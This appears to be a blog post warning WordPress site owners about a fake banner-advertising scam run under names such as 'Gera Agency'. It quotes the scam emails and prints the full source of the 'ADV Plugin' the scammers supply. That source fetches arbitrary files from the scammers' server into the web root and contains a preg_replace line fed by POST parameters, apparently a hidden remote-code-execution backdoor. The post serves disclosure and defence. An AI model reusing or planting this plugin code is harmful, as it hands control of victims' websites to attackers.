Banner Ads Scam with ADV Plugin for WordPress

lacoste banner ads scam A true story which might help someone out there
(I have replaced the real domain name with DOMAIN.COM):

Couple days ago I have received few emails written in not-that-good english from “Valentin Lopez representing the Gera Agency” (vlopez@geraagency.com), apparently a French marketing company based in Paris. You can find the complete text from the emails below in this article (apart from the domain name).

[ad]


First Email
First email was pretty brief, I didn’t pay much attention to it but have replied asking for more information on this subject.

Strange was tho that someone is willing to buy banner ad space on a site which is under construction having only few pages with actual content and getting only small amount of traffic. (it is a WordPress site)

Subject: We would like to buy banner space on DOMAIN.COM.
 
Hi,
 
I am sorry I have to write you to e-mail from whois information of the domain. 
But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site DOMAIN.COM.
Is it possible to place banner on your site on a fee basis?
 
Best regards,
 
Valentin Lopez

Second Email
This was more interesting, the banners are supposed to be for a well known brand! Now mentioning also the company name (Gera Agency) and contact details including a fake-ish phone number.

Hello,
 
Thanks for reply to our proposal!
 
I represent Gera Agency. At the moment we are preparing an advertising campaign for Lacoste Company 
(it is a French company producing clothes, footwear, perfumery etc.) 
We already have designed banners for the campaign, they are the following sizes: 
160x600, 240x400, 300x250, 336x280, 468x60, 728x90.
What can be your price for one banner (banner should appear at ALL pages of your site) 
of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? 
Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
 
Best regards,
 
 
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

A quick look at the email headers gave more information:

Received: from colo-69-172-130-14.pilosoft.com (HELO nanaagency.com) (69.172.130.14)
          by colo-69-172-130-14.pilosoft.com with SMTP; 30 Jan 2012 ...
Message-ID: <something@nanaagency.com>

So we have also a Nana Agency going on and the site is the same (apart from the Agency name). I have googled both but did not find any further information about these fictional agencies.

The Gera Agency domain shows no PageRank or Alexa Rank, a search in archive.org reveals that the domain name was used previously by some travel agent, so it is probably a dropped domain name.

Whois search unfortunately doesn’t give much info apart from that the domain owner wishes to stay anonymous.
But it indicates that the domain was registered on the same day, possibly even after the First Email was sent.

Creation Date: 30-Jan-2012  
Expiration Date: 30-Jan-2013
 
Administrative Contact:
    PrivacyProtect.org
    Domain Admin        ()
    ID#10760, PO Box 16
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Nobby Beach
    null,QLD 4218
    AU
    Tel. +45.36946676

I have just replied that I would like to see the banners first and a third email came in.

Third Email
A brief one with link to a “little app” for managing banner ads. It did indeed show those animated gif banners prepared in different variations and sizes to choose from.

Hi!
Here you can see our banners: http://docs.geraagency.com/lacoste/?view=1
 
 
Best regards,
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

I have finally given some inadequate prices and a fourth email came in without any negotiations.

Fourth Email
To my surprise someone has taken the effort and setup my account in the banner ad manager with the correct sizes, domain name etc. From the control panel one can download a WordPress plugin for placing the banner ads called the “ADV Plugin”. There is also a help page with instructions.

Hi!
 
Thanks for reply to our proposal!
We like your price.
To pass to the banner control system follow the link http://webmaster.geraagency.com
To enter use the following data:
 
login: DOMAIN.COM
password: *********
 
 
You should install and activate the plugin in order to display advertisement. 
Before making payment, advertiser must approve location of the banner. 
The banner will be shown on your site when you add special code to your web- address 
(for example: http://DOMAIN.COM/?adv_test=1). 
It means, that visitors will see the banner only if it is approved and payment made.
 
To get installation instruction for your site type pass to: http://docs.geraagency.com/wp_install
To activate your site you have to enter the code: *********
 
What way of payment is suitable for you?
 
Best regards,
Valentin Lopez.
site: www.geraagency.com
e-mail: vlopez@geraagency.com
phone: + (0)9 78 62 85 38

The plugin does create new directories and downloads stuff from the above mentioned domain/s, giving the faith of the site to the hands of the Gera (or any other name) Agency.

It does read settings from a "config" file where it can take multiple items from 
<banner_item>anything here even .mydodgyscript.php</banner_item>
and one match from 
<show_banner>anything here</show_banner>
and it displays only the item specified in <show_banner></show_banner>.

So in theory one can click Download Banners and it can download a somebanner.gif and somethingdodgy.php and show only the somebanner.gif, all looking fine, then use somethingdodgy.php to take control, upload, download, delete, modify…

What really happens with this plugin I don’t know as I have never installed it on my server, but it depends on the people in control of the config file…

You can find the plugin code as below.
The same concept is used on many domains and under different “Agency” names, I hope this helps someone …

  • Noah Vincent / Legretto Agency
  • Tristan Muller / Gana Agency
  • Valentin Lopez / Gera Agency
  • Matthieu Colin / NanaAgency
  • Oscar Meunier / Kervel Agency
  • Eliott Arnaud / Larko Agency
  • Lilian Marchand / Lemma Agency
  • Rayan Meyer / Bevesto Agency
  • and others …
 
/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */
 
class AdvWidget extends WP_Widget {
 
    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }
 
    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }
 
    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }
 
    function form($instance) {
 
    }
 
}
 
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
 
add_action('admin_menu', 'advPluginMenu');
 
register_activation_hook(__FILE__, 'advActivation');
 
define('ADV_SERVICE_DOMAIN', 'geraagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');
 
function advReadUrl($url) {
    if (function_exists('curl_init')) {        
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}
 
function advActivation() {
    update_option('adv_place', 'widget');
}
 
register_deactivation_hook(__FILE__, 'advDeactivation');
 
function advDeactivation() {
    delete_option('adv_key');
}
 
function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}
 
function adv_show_banner() {
    advShowBanner();
}
 
function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}
 
function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message" class="updated"><p>Code activation error.</p></div>';
    }
}
 
function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>';
    }
}
 
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
 
function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }
 
    $advPlace = get_option('adv_place');
    echo '<div class="wrap">';
 
    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}